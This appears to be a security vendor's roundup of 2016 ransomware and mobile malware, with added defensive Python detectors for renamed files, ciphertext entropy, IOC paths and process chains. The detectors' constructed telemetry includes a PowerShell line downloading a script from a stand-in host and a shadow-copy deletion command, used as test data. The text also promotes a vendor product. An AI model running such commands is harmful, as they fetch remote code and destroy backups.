Alma Locker Ransomware

Alma Locker is a newly observed virus that has joined the ransomware threats currently in circulation. It has some uncommon features: it uses Tor-hosted command and control servers, and while most viruses of this kind spread mainly through malicious spam email attachments, this sample is distributed through an exploit kit.

Alma Locker generates a random 5-character extension that is appended to encrypted files, and a unique 8-character victim ID. The victim ID is derived from the serial number of the C:\ drive and the MAC address of the first network interface. Alma Locker then searches the victim’s drive letters for files with certain extensions and encrypts them using AES-128. When it encrypts a file it appends the previously generated extension to the encrypted file. For example, if the extension associated with a victim is .a5zfn, a file named test.jpg is encrypted to a file named test.jpg.a5zfn.
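
As an added illustration of the naming pattern just described (example code written for this page, not part of the original post or of any analysis tooling), the following Python scans a constructed list of file paths for the name.ext.xxxxx pattern and reports any five-character suffix that several renamed files share. The set of known extensions and the threshold of three files are assumptions chosen for the example; a single oddly named file is noise, the same random suffix on many files of different types is what this kind of ransomware leaves behind.

```python
import re
from collections import defaultdict

# Extensions a user file normally ends with. Constructed for this example; a real
# deployment would use a much longer list or check the file's own magic bytes.
KNOWN_EXTS = {"jpg", "jpeg", "png", "gif", "doc", "docx", "xls", "xlsx", "ppt", "pptx",
              "pdf", "txt", "zip", "rar", "7z", "gz", "mp3", "mp4", "psd"}

# <stem>.<original extension>.<five alphanumerics>, e.g. test.jpg.a5zfn
ALMA_PATTERN = re.compile(r"^(?P<stem>.+)\.(?P<orig>[a-z0-9]{1,5})\.(?P<suffix>[a-z0-9]{5})$",
                          re.IGNORECASE)


def split_alma_name(filename):
    """Return (original_name, suffix) if filename looks like an Alma-renamed file, else None."""
    m = ALMA_PATTERN.match(filename)
    if not m or m.group("orig").lower() not in KNOWN_EXTS:
        return None
    return f"{m.group('stem')}.{m.group('orig')}", m.group("suffix").lower()


def find_suspicious_suffixes(paths, min_files=3):
    """Group renamed files by appended suffix; one unknown suffix on many files is the signal."""
    by_suffix = defaultdict(list)
    for path in paths:
        name = path.replace("\\", "/").rsplit("/", 1)[-1]
        hit = split_alma_name(name)
        if hit is not None:
            by_suffix[hit[1]].append(path)
    return {s: files for s, files in by_suffix.items() if len(files) >= min_files}


# Constructed sample listing, not data from a real infection.
SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\budget.xlsx.a5zfn",
    r"C:\Users\alice\Documents\notes.txt.a5zfn",
    r"C:\Users\alice\Pictures\holiday.jpg.a5zfn",
    r"C:\Users\alice\Pictures\holiday.jpg",        # untouched original
    r"C:\Users\alice\Downloads\setup.zip.part1",   # odd name, but only one file
    r"C:\Users\alice\Desktop\readme.txt",
]

if __name__ == "__main__":
    for suffix, files in find_suspicious_suffixes(SAMPLE_PATHS).items():
        print(f"suffix .{suffix} appended to {len(files)} files:")
        for f in files:
            print("   ", f)
```

Run as a script it reports only .a5zfn; the lone setup.zip.part1 stays below the threshold, which is the point of counting per suffix rather than alerting on each file.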

The data file types targeted by Alma Locker are listed in a screenshot (image not reproduced here).

While encrypting files, Alma Locker skips files located in folders whose names contain certain strings; the list is given in a screenshot (image not reproduced here).

During the encryption process, Alma Locker sends the following information, base64 encoded, to the ransomware’s Command & Control server: the AES-128 decryption key, the encrypted-file extension, the user name, the name of the active network interface, the system Locale ID (LCID), the operating system version, the victim ID, the security software registered with Windows, and the time stamp of when the program was started. When it has finished, it displays a ransom note explaining what has happened to the victim’s files:

(image: Alma Locker ransom note)

The ransom note contains links to the TOR payment site and a link to download a decryptor. When this decryptor is run, it connects to the Command & Control server and retrieves information such as the current ransom amount, whether a payment has been received, and how many hours are left in the five-day countdown.

(image: Alma Locker decryptor)

The ransom note also links to a TOR site where the criminals state that a victim can perform some test file decryptions to prove that they are able to decrypt the files.

(image: Alma Locker test decryption page)

Unfortunately, it appears that this free decryption is currently not working.

New DetoxCrypto Ransomware pretends to be PokemonGo

(image: DetoxCrypto wallpaper)

Above is the screenshot of a message (wallpaper) encouraging users to contact the developers of DetoxCrypto ransomware to decrypt their compromised data.

DetoxCrypto is ransomware-type malware that infiltrates the system and encrypts various data types (.psd, .ppt, .docx, .zip, .rar, etc.). Note that unlike other ransomware, DetoxCrypto does not change the filenames or add any type of extension, which is quite unusual. Following successful encryption, DetoxCrypto changes the desktop wallpaper and opens a pop-up window. Both contain a ransom-demand message.
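
Because DetoxCrypto leaves filenames and extensions untouched, a defender cannot rely on a renamed-file signal the way the Alma Locker section allows. The added Python example below (written for this page, not part of the original post or of any vendor tooling) shows the two checks that work in that situation: the file no longer starts with the header its extension implies, and its content has the byte entropy of ciphertext. The magic-byte table, the 7.5 bits-per-byte threshold and the sample files are assumptions constructed for the example.

```python
import hashlib
import io
import math
import zipfile
from collections import Counter

# File types the article names as DetoxCrypto targets, with the leading bytes each format
# normally starts with. Constructed for this example, not a complete table.
MAGIC = {
    ".docx": b"PK\x03\x04",
    ".zip": b"PK\x03\x04",
    ".psd": b"8BPS",
    ".rar": b"Rar!",
    ".ppt": b"\xd0\xcf\x11\xe0",
}


def shannon_entropy(data):
    """Bits per byte of the content: close to 8.0 for ciphertext, lower for most formats."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def assess_file(name, content, entropy_threshold=7.5):
    """Flag a watched file whose header is gone AND whose body looks like ciphertext.

    Returns None for extensions that are not watched. Header check and entropy are combined
    because each alone misfires: .zip/.docx bodies are legitimately high-entropy (compressed),
    and a text file saved under the wrong extension has no header but low entropy.
    """
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    if ext not in MAGIC:
        return None
    header_ok = content.startswith(MAGIC[ext])
    entropy = shannon_entropy(content)
    return {
        "name": name,
        "header_ok": header_ok,
        "entropy": round(entropy, 3),
        "suspicious": (not header_ok) and entropy >= entropy_threshold,
    }


def deterministic_noise(n, seed=b"constructed-sample"):
    """Stand-in for ciphertext: chained SHA-256 output, so the example is reproducible."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_docx_like():
    """A minimal real zip container, which is what an intact .docx is."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>" * 200)
        zf.writestr("word/document.xml", "<w:document/>" * 200)
    return buf.getvalue()


# Constructed samples: an intact document, a document overwritten in place with ciphertext,
# plaintext saved under a .ppt name, and an unwatched file type.
SAMPLES = {
    "report.docx": build_docx_like(),
    "report-after.docx": deterministic_noise(4096),
    "notes.ppt": b"agenda item one\n" * 256,
    "notes.txt": b"plain text, never examined",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, assess_file(name, data))
```

Only report-after.docx is flagged: the intact document keeps its PK header even though deflated content is high-entropy, and the mislabelled .ppt has no header but an entropy of about 3 bits per byte, so neither trips both conditions.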

DetoxCrypto informs users of the encryption and states that decryption without a private key is impossible. When asymmetric cryptography is used, two keys (a public key for encryption and a private key for decryption) are generated during the encryption process. The cyber criminals store the private key on remote servers and users are encouraged to buy it. To contact the cyber criminals, victims are asked to write an email to pokemongo@mail2tor.com, contact365@mail2tor.com or motox2016@mail2tor.com. The ransom is 3 Bitcoins (currently, 1 Bitcoin is equivalent to ~$574). This ransom is quite large, since most cyber criminals responsible for developing ransomware demand 0.5 to 1.5 Bitcoin.

Screenshot of DetoxCrypto ransom-demand pop-up message:

(image: DetoxCrypto ransom-demand pop-up)

The Pokemon-themed variant of DetoxCrypto is distributed as an executable called Pokemongo.exe. When executed, the ransomware extracts numerous files to the C:\Users\[account_name]\Downloads\Pokemon folder, as shown below.

(image: contents of the Pokemon folder)

So far there is no way to repair the encrypted files, and paying the ransom has not helped either: in some cases the criminals took the money and did not provide a key to decrypt the files. The best option is therefore to use a good total security program such as Max Total Security, which provides an automatic backup feature; schedule it to back up every day so that you are prepared for such an event and can restore your backed-up files or restore your PC to the last known good configuration.

QuadRooter Android Vulnerabilities in Over 900 Million Devices

QuadRooter is a set of four vulnerabilities affecting Android devices built on Qualcomm® chipsets. If any one of the four is exploited, an attacker can escalate privileges and gain root access to the device. The vulnerabilities can be exploited by a malicious app, and such an app requires no special permissions to take advantage of them, which removes any suspicion users might otherwise have when installing it.

This affects an estimated 900 million Android devices manufactured by OEMs like Samsung, HTC, Motorola, LG and more. In fact, some of the latest and most popular Android devices found on the market today use the vulnerable Qualcomm chipsets including:

BlackBerry Priv
Blackphone 1 and 2
Google Nexus 5X, 6 and 6P
HTC One M9 and HTC 10
LG G4, G5, and V10
New Moto X by Motorola
OnePlus One, 2 and 3
Samsung Galaxy S7 and S7 Edge
Sony Xperia Z Ultra

Unique vulnerabilities affect four modules. Each vulnerability impacts a device’s entire Android system:
1. IPC Router (inter-process communication)
2. Ashmem (Android kernel anonymous shared memory feature)
3. kgsl (kernel graphics support layer)
4. kgsl_sync (kernel graphics support layer sync)

Please follow these best practices to keep your Android devices safe:
- Download and install the latest Android updates as soon as they become available. These include important security updates that help keep your device and data protected.
- Understand the risks of rooting your device, whether intentionally or as a result of an attack.
- Avoid side-loading Android apps (.APK files) or downloading apps from third-party sources. Instead, practice good app hygiene by downloading apps only from Google Play.
- Carefully read permission requests when installing apps. Be wary of apps that ask for unusual or unnecessary permissions or that use large amounts of data or battery life.
- Use known, trusted Wi-Fi networks. If traveling, use only networks you can verify are provided by a trustworthy source.
- Consider mobile security solutions such as Max Total Security that detect suspicious behavior on a device, including malware hiding in installed apps.

Hitler-Ransomware

(image: Hitler-Ransomware lock screen)

Hitler-Ransomware, a piece of file-encrypting malware that emerged recently, isn’t yet able to encrypt files, but still displays a lock screen and asks for a €25 ($28) ransom.

The Hitler ransomware infection takes place when the user double-clicks an infected binary. It looks like file deletion is becoming a standard tactic in new ransomware applications created by less skilled ransomware developers. This is shown in a new ransomware called Hitler-Ransomware, misspelled in the lock screen as Hitler-Ransonware. This ransomware shows a lock screen displaying Hitler and then states that your files were encrypted. It then prompts you to enter the cash code of a 25 Euro Vodafone Card as the ransom payment to decrypt your files.

This ransomware appears to be a test variant based on the comments in the embedded batch file and because it does not encrypt any files at all. Instead this malware will remove the extension for all of the files under various directories, display a lock screen, and then show a one hour countdown as shown in the lock screen below. After that hour it will crash the victim’s computer, and on reboot, delete all of the files under the %UserProfile% of the victim. I hope this is not the actual code that this ransomware developer plans on using if it goes live.

The developer also appears to be German, based on the text found within an embedded batch file. The batch file contains the following German text:
Das ist ein Test
besser gesagt ein HalloWelt
copyright HalloWelt 2016
:d by CoolNass
Ich bin ein Pro
fuer Tools für Windows

This translates to English as:
This is a test
rather a Hello World
copyright Hello World 2016
: D by Cool Wet
I am a Pro
for Tools for Windows

Files associated with Hitler-Ransomware:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\firefox32.exe
%Temp%\[folder].tmp\
%Temp%\[folder].tmp\chrst.exe
%Temp%\[folder].tmp\ErOne.vbs
%Temp%\[folder].tmp\firefox32.exe

Max Total Security can detect and remove this Malware.

Banking Trojan risks Android devices

The malware is disguised as a browser update, a malicious application called last-browser-update.apk. As it turned out, the malicious downloads were happening through the Google AdSense advertising network, which is used by many sites (not just news sites) to display targeted advertising to users; site owners carry the same advertisements.

To spread the infection, the Trojan abuses the Google AdSense advertising network, which delivers targeted advertising. When the user visits a page carrying the advertisement, the Trojan download starts immediately.

Malware of the Svpeng family can steal the user’s bank card details via phishing windows, as well as intercept, delete and send text messages. In addition, the Trojan collects information about calls, the content of text and multimedia messages, browser bookmarks, and contacts.

Max Total Security for Android can detect and remove such Malware.

R980 Ransomware arrives via spam emails

(image: R980 ransom note)

Like Locky, Cerber and MIRCOP, the spam emails carrying this ransomware contain documents embedded with a malicious macro (detected as W2KM_CRYPBEE.A) that is programmed to download R980 from a particular URL. Active connections to that URL have been observed since July 26th of this year, when R980 was first detected.

R980 encrypts 151 file types using a combination of the AES-256 and RSA 4096 algorithms. Although it appends the .crypt extension to encrypted files, it bears no other resemblance to earlier versions of CryptXXX, which used the same extension. For its encryption mechanism, R980 uses a Cryptographic Service Provider (CSP), a software library that developers use to implement cryptographic functions in Windows-based applications.

For persistence, it uses the registry key, HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Unlike most ransomware, it does not delete itself after infecting the system. R980 is also somewhat reminiscent of DMA Locker (detected as RANSOM.MADLOCKER.B) as it drops the following components and indicators of compromise (IOC):

rtext.txt – the ransom note
status.z – IOC for initial execution of the ransomware
status2.z – IOC for the execution of the dropped copy
k.z – contains the downloaded base64 decoded data
fnames.txt – contains the filenames of the encrypted files
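
As an added example covering both the Hitler-Ransomware file list above and the R980 drop files and Run-key persistence described in this section (written for this page, not code from either analysis), the Python below matches a constructed inventory of file paths and HKCU Run entries against those indicators. The Run-key rule, which flags any Run value whose command lives in a temporary or per-user AppData folder, is an assumption of the example: the article states that R980 uses the Run key but not the value name it writes, so the rule is a general heuristic rather than a signature.

```python
import re

# Indicators taken from the article. Paths are compared lower-cased with backslashes.
HITLER_STARTUP = re.compile(r"\\start menu\\programs\\startup\\firefox32\.exe$")
HITLER_TEMP = re.compile(r"\\temp\\[^\\]+\.tmp\\(chrst\.exe|erone\.vbs|firefox32\.exe)$")
R980_DROPS = {"rtext.txt", "status.z", "status2.z", "k.z", "fnames.txt"}

RUN_KEY = r"hkcu\software\microsoft\windows\currentversion\run"
# Assumption for this example: a Run value launched from a temp or AppData folder is worth a
# look. The article says only that R980 persists through the Run key.
USER_WRITABLE = re.compile(r"\\(temp|appdata\\(local|roaming))\\")


def normalize(path):
    return path.replace("/", "\\").lower()


def classify_path(path):
    """Name the family whose indicators the path matches, or None."""
    p = normalize(path)
    if HITLER_STARTUP.search(p) or HITLER_TEMP.search(p):
        return "Hitler-Ransomware"
    if p.rsplit("\\", 1)[-1] in R980_DROPS:
        return "R980"
    return None


def classify_run_value(key, value_name, command):
    """Flag Run-key persistence launched from a user-writable location (heuristic, see above)."""
    if normalize(key) != RUN_KEY:
        return None
    if USER_WRITABLE.search(normalize(command)):
        return f"suspicious Run value '{value_name}'"
    return None


def scan(paths, run_values):
    """Return (indicator, verdict) pairs for everything that matched."""
    hits = []
    for path in paths:
        verdict = classify_path(path)
        if verdict:
            hits.append((path, verdict))
    for key, name, command in run_values:
        verdict = classify_run_value(key, name, command)
        if verdict:
            hits.append((f"{key}\\{name}", verdict))
    return hits


# Constructed inventory, not the output of a real scan.
SAMPLE_PATHS = [
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\firefox32.exe",
    r"C:\Users\bob\AppData\Local\Temp\a1b2c3.tmp\ErOne.vbs",
    r"C:\Users\bob\AppData\Local\Temp\a1b2c3.tmp\chrst.exe",
    r"C:\Users\bob\Documents\status2.z",
    r"C:\Users\bob\Documents\fnames.txt",
    r"C:\Windows\System32\notepad.exe",
    r"C:\Program Files\Mozilla Firefox\firefox.exe",   # the real browser, not firefox32.exe
]
SAMPLE_RUN_VALUES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r"C:\Program Files\OneDrive\OneDrive.exe /background"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "updater",
     r"C:\Users\bob\AppData\Local\Temp\svc.exe"),
]

if __name__ == "__main__":
    for indicator, verdict in scan(SAMPLE_PATHS, SAMPLE_RUN_VALUES):
        print(f"{verdict:<35} {indicator}")
```

The Hitler-Ransomware rules are anchored on the full relative path (Startup folder, or a .tmp folder under Temp) rather than on the bare filename, so the legitimate firefox.exe is not confused with the dropped firefox32.exe; the R980 names are matched on the basename only because the article does not give their drop location.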

To protect yourself from such ransomware, you need to back up your data regularly. Max Total Security detects and can protect your PC from such Malware.

Malicious app on Google Play

McAfee Labs researchers have discovered a set of malicious apps on Google Play published by the developer account ValerySoftware.

Some characteristics of this malware:

1. Encrypted and obfuscated at many levels
2. Downloads APK files from external sources
3. Tries to install apps from Google Play without user interaction
4. Displays or silently accesses ads from multiple vendors of advertisement development kits
5. Leaks sensitive information
6. Receives commands to open and close applications
7. Receives commands to install and uninstall applications

This Trojan pretends to be a game patch but is only a WebView function that locally loads a couple of HTML resources after requesting device admin privileges—probably to avoid uninstallation after its disappointing execution. In the background, however, the malware loads and decrypts multiple .dex files to start malicious activities that go unnoticed.

Based on the domain owner’s information found in this malware, the authors can be tied to a group of known cyber criminals in Europe who host and distribute malware. To pass unnoticed, the malware authors built anti-emulation techniques into the malicious code so that its behavior could not be observed by automated dynamic test environments.

Although Google has been successful in improving the policing of malicious apps, this threat is a reminder that malware can still be present even in official stores. Your first check before installing an app should be reviews by other users. Also check that permissions the app requests are related to its functionality, and review the developer profile to look for other apps.

OSX malware Eleanor

Security researchers have discovered a nasty surprise hidden in a fake file-converter application called EasyDoc Converter, available on a number of download sites, that delivers everything except what users expect. The EasyDoc Converter app purports to be a drag-and-drop file converter, but in reality has no useful functionality: it simply downloads a malicious script.

The new Mac malware OSX/Eleanor is a serious threat and, if installed, can enable attackers to take full control of the compromised machine. It opens a backdoor on infected Macs and, according to researchers, can steal data, execute remote code and access the webcam, among other things.

Powerware Ransomware scares users with .Locky extensions

This malware encrypts files on a victim’s machine and demands a ransom in the Bitcoin cryptocurrency.

In addition to using the ‘.locky’ filename extension on encrypted files, this PowerWare variant also uses the same ransom note as the Locky malware family. This is not the first time PowerWare has imitated other malware families; earlier versions are known to have used the CryptoWall ransom note. Other ransomware has also been known to borrow code from others, for example the TeslaCrypt ransomware family.

This mimicry of the far more mature and sophisticated Locky ransomware is an attempt by the PowerWare authors to trick victims into thinking they are dealing with Locky rather than with the immature PowerWare ransomware, which can be defeated.

Compared to Locky, PowerWare uses static hard-coded encryption keys, so decryption is possible, and it packs a far weaker psychological punch to victims because it is new and unknown. “If someone is infected with Locky the only way to get your files back is by paying the ransom. But PowerWare is relatively lame compared to Locky.”

Victims become infected with the PowerWare ransomware if they are tricked into enabling macros in malicious Word documents. Once enabled, the macro opens cmd.exe, which then calls PowerShell to download a malicious script; the macro exists only to launch PowerShell and pull down the ransomware script. PowerWare then uses PowerShell to encrypt the files stored on the compromised machine.

Malware mimics and flatters other popular malware and cashes in on its success

A new ransomware family called CrypMIC is found to be impersonating CryptXXX ransomware. The new ransomware family mimics CryptXXX not only in terms of entry point, but also when it comes to the ransom note and payment site UI.

However, the source code and capabilities of the two are different. CrypMIC does not append an extension to encrypted files, and it uses a different compiler and obfuscation method. Moreover, unlike CryptXXX, CrypMIC has a routine that checks for the presence of a virtual machine on the infected system and is designed to send that information to its C&C.

The new ransomware uses AES-256 encryption, targets 901 file types on infected machines, and has no autostart or persistence mechanism. It runs its encryption routine even in a virtualized environment and reports that fact to the C&C. It also uses vssadmin to delete shadow copies.
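
Two behaviours in this page are visible in ordinary process-creation telemetry: the PowerWare chain described earlier (a Word macro launches cmd.exe, which launches PowerShell to download the script) and CrypMIC’s use of vssadmin to delete shadow copies. The added Python example below (written for this page, not code from either analysis) runs one rule for each over constructed Sysmon-style process records. The record format, the Office process names and the download markers are assumptions of the example; the sample records are constructed, not real telemetry.

```python
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient")


def parse_events(lines):
    """Parse 'key=value|key=value' records into dicts keyed by pid."""
    events = {}
    for line in lines:
        rec = dict(field.split("=", 1) for field in line.split("|"))
        rec["pid"], rec["ppid"] = int(rec["pid"]), int(rec["ppid"])
        events[rec["pid"]] = rec
    return events


def basename(image):
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(events, pid):
    """Yield parent, grandparent, ... Stops at a missing parent. Real telemetry should also
    key on process GUID or start time, because PIDs are reused."""
    seen = set()
    pid = events[pid]["ppid"]
    while pid in events and pid not in seen:
        seen.add(pid)
        yield events[pid]
        pid = events[pid]["ppid"]


def detect(events):
    """Apply both rules; return (rule, pid) pairs sorted by pid."""
    hits = []
    for pid, ev in events.items():
        name, cmd = basename(ev["image"]), ev["cmdline"].lower()
        # Rule 1: PowerShell with a download cradle whose ancestry includes an Office process.
        # Walking the ancestry (not just the parent) is what catches the cmd.exe hop in between.
        if (name == "powershell.exe" and any(m in cmd for m in DOWNLOAD_MARKERS)
                and any(basename(a["image"]) in OFFICE_IMAGES for a in ancestors(events, pid))):
            hits.append(("office_spawned_powershell_download", pid))
        # Rule 2: vssadmin asked to delete shadow copies ("list shadows" is benign).
        if name == "vssadmin.exe" and "delete" in cmd and "shadows" in cmd:
            hits.append(("vssadmin_delete_shadows", pid))
    return sorted(hits, key=lambda h: h[1])


# Constructed records, not real telemetry.
SAMPLE_EVENTS = [
    r"pid=1200|ppid=800|image=C:\Windows\explorer.exe|cmdline=explorer.exe",
    r"pid=2300|ppid=1200|image=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|cmdline=WINWORD.EXE /n invoice.docm",
    r"pid=2410|ppid=2300|image=C:\Windows\System32\cmd.exe|cmdline=cmd.exe /c powershell.exe -w hidden -NoProfile",
    r"pid=2455|ppid=2410|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/stage.ps1','%TEMP%\stage.ps1')",
    r"pid=2500|ppid=2455|image=C:\Windows\System32\vssadmin.exe|cmdline=vssadmin.exe delete shadows /all /quiet",
    r"pid=3100|ppid=1200|image=C:\Windows\System32\cmd.exe|cmdline=cmd.exe",
    r"pid=3150|ppid=3100|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell.exe Get-Process",
    r"pid=3200|ppid=1200|image=C:\Windows\System32\vssadmin.exe|cmdline=vssadmin.exe list shadows",
]

if __name__ == "__main__":
    for rule, pid in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{rule:<36} pid={pid}")
```

The interactive PowerShell under explorer.exe and the vssadmin list command are left alone; only the Office-rooted download and the shadow-copy deletion fire, which is the precision a rule like this needs before it is worth an alert.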

The same as CryptXXX, CrypMIC is particularly dangerous to enterprises because it can also encrypt files on removable and network drives, although it can target only network shares that have been already mapped to a drive. Both ransomware families demand the same ransom amount, namely 1.2 to 2.4 Bitcoins.

However, the newcomer does not download and execute an information-stealing module in its process memory, so it is not able to harvest credentials and related information from the infected machine, something CryptXXX has become famous for. Businesses and users who end up paying the ransom are susceptible to further ransomware attacks. The best way to protect against such threats is to keep systems updated, to have the latest security patches installed, to use multilayered defenses, and to back up data constantly, so that files can be easily restored even in case of an infection.